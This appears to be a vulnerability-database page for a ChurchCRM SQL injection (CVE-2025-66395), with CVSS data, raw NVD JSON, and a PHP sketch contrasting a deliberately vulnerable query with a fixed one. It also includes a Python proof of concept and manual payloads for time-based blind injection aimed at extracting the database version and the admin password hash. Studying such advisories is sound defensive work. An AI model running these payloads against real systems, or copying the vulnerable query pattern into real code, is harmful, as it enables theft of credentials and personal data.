Security Vulnerability Report
CVE-2025-66395 CVSS 8.8 HIGH

CVE-2025-66395

Published: 2025-12-17 19:16:12
Last Modified: 2025-12-18 19:08:38

Description

ChurchCRM is an open-source church management system. Prior to version 6.5.3, a SQL injection vulnerability exists in the `src/ListEvents.php` file. When filtering events by type, the `WhichType` POST parameter is not properly sanitized or type-casted before being used in multiple SQL queries. This allows any authenticated user to execute arbitrary SQL commands, including time-based blind SQL injection attacks. Any authenticated user, regardless of their privilege level, can execute arbitrary queries on the database. This could allow them to exfiltrate, modify, or delete any data in the database, including user credentials, financial data, and personal information, leading to a full compromise of the application's data. Version 6.5.3 fixes the issue.
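The CWE-89 pattern the advisory describes (a POST parameter concatenated into several SQL statements without a type cast or parameter binding) and the kind of fix that removes it, as an added illustration written for this page. This is not ChurchCRM's own `src/ListEvents.php`; the table and column names (`event_list`, `event_type_id`, `event_end`), the `$pdo` connection and the function names are assumptions chosen for the example.

```php
<?php
// Added illustration only: NOT ChurchCRM's code. Table/column names and the
// $pdo connection are assumed for the example.

// --- Vulnerable pattern: the POST value is interpolated straight into SQL. ---
// Whatever arrives in WhichType becomes part of the statement text, so a
// non-numeric value such as "1 AND SLEEP(5)" is executed as SQL (the
// time-based blind injection the advisory describes).
function listEventsVulnerable(PDO $pdo, string $mode): array
{
    $whichType = $_POST['WhichType'] ?? '';
    $order = ($mode === 'Past') ? 'DESC' : 'ASC';
    $sql = "SELECT * FROM event_list WHERE event_type_id = " . $whichType
         . " ORDER BY event_end " . $order;
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// --- Hardened pattern: validate the type, then bind the value. ---
function listEventsHardened(PDO $pdo, string $mode): array
{
    // 1. Type enforcement: the filter is a numeric id, so reject anything
    //    that is not an integer before it gets near a query. This alone
    //    closes the injection; the cast is a second line of defence.
    $raw = $_POST['WhichType'] ?? '';
    if ($raw !== '' && filter_var($raw, FILTER_VALIDATE_INT) === false) {
        throw new InvalidArgumentException('WhichType must be an integer');
    }
    $whichType = (int) $raw;

    // 2. ORDER BY direction cannot be a bound parameter, so it is taken from a
    //    fixed allowlist and never from user input.
    $order = ($mode === 'Past') ? 'DESC' : 'ASC';

    // 3. Bind the id as an integer parameter; the driver sends it as a value,
    //    never as statement text, so it cannot alter the query structure.
    if ($whichType === 0) {
        // Assumed convention: 0 means "all event types".
        $stmt = $pdo->prepare("SELECT * FROM event_list ORDER BY event_end $order");
        $stmt->execute();
    } else {
        $stmt = $pdo->prepare(
            "SELECT * FROM event_list WHERE event_type_id = :type ORDER BY event_end $order"
        );
        $stmt->bindValue(':type', $whichType, PDO::PARAM_INT);
        $stmt->execute();
    }
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}
```

The point worth checking in a review of any fix for this class of bug is that every query that consumes the parameter goes through the same validated, bound value; the advisory notes the parameter is used in multiple queries, so casting it in one place and interpolating it elsewhere would leave the flaw in place. Audit-wise, a request to this endpoint whose `WhichType` field contains anything other than digits is a cheap, high-signal detection for attempts against unpatched installs.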

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:* - VULNERABLE
ChurchCRM < 6.5.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import time

# CVE-2025-66395 ChurchCRM SQL Injection PoC
# Target: ChurchCRM < 6.5.3
# Vulnerability: authenticated SQL injection via the WhichType parameter in src/ListEvents.php

target_url = "http://target-server/churchrm/src/ListEvents.php"
login_url = "http://target-server/churchrm/src/Login.php"

# Step 1: Authenticate with valid credentials
session = requests.Session()
login_data = {
    "UserBoxEntry": "[email protected]",
    "Password": "password123"
}
session.post(login_url, data=login_data)


# Step 2: Test basic SQL injection with time-based blind technique
def test_sql_injection(session, payload, expected_delay=5):
    """Test SQL injection with time-based blind technique"""
    start_time = time.time()
    data = {
        "WhichType": payload,
        "FilterName": "",
        "Mode": "Past"
    }
    response = session.post(target_url, data=data, timeout=30)
    elapsed = time.time() - start_time
    return elapsed >= expected_delay


# Step 3: Extract database version using blind SQL injection
def extract_db_version(session):
    """Extract database version via time-based blind SQL injection"""
    version = ""
    charset = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz._-"
    for pos in range(1, 50):
        found = False
        for char in charset:
            payload = f"1 AND (SELECT CASE WHEN (SUBSTRING(@@version,{pos},1)='{char}') THEN SLEEP(3) ELSE 0 END)"
            if test_sql_injection(session, payload, expected_delay=3):
                version += char
                found = True
                print(f"[+] Position {pos}: {char}")
                break
        if not found:
            break
    return version


# Step 4: Extract admin credentials
def extract_admin_hash(session):
    """Extract admin password hash from user table"""
    hash_value = ""
    charset = "0123456789ABCDEFabcdef"
    for pos in range(1, 65):
        for char in charset:
            payload = f"1 AND (SELECT CASE WHEN (SUBSTRING((SELECT password FROM user_perms WHERE id=1),{pos},1)='{char}') THEN SLEEP(3) ELSE 0 END)"
            if test_sql_injection(session, payload, expected_delay=3):
                hash_value += char
                print(f"[*] Extracting hash position {pos}: {char}")
                break
    return hash_value


# Example payloads for manual testing:
# Time-based blind: WhichType=1 AND (SELECT * FROM (SELECT(SLEEP(5)))a)
# Union-based: WhichType=1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--
# Boolean-based: WhichType=1 AND 1=1

print("[*] CVE-2025-66395 ChurchCRM SQL Injection PoC")
print("[*] Target: ChurchCRM < 6.5.3")
print("[*] Testing authenticated SQL injection via WhichType parameter")

References

https://github.com/ChurchCRM/CRM/security/advisories/GHSA-c9xf-f3gr-xfwv (Vendor Advisory, Exploit)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-66395",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-17T19:16:11.807",
    "lastModified": "2025-12-18T19:08:38.293",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "ChurchCRM is an open-source church management system. Prior to version 6.5.3, a SQL injection vulnerability exists in the `src/ListEvents.php` file. When filtering events by type, the `WhichType` POST parameter is not properly sanitized or type-casted before being used in multiple SQL queries. This allows any authenticated user to execute arbitrary SQL commands, including time-based blind SQL injection attacks. Any authenticated user, regardless of their privilege level, can execute arbitrary queries on the database. This could allow them to exfiltrate, modify, or delete any data in the database, including user credentials, financial data, and personal information, leading to a full compromise of the application's data. Version 6.5.3 fixes the issue."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-89"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "6.5.3",
                "matchCriteriaId": "5B1435CA-1370-4154-85E0-6AF1846DEEBD"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/ChurchCRM/CRM/security/advisories/GHSA-c9xf-f3gr-xfwv",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      },
      {
        "url": "https://github.com/ChurchCRM/CRM/security/advisories/GHSA-c9xf-f3gr-xfwv",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}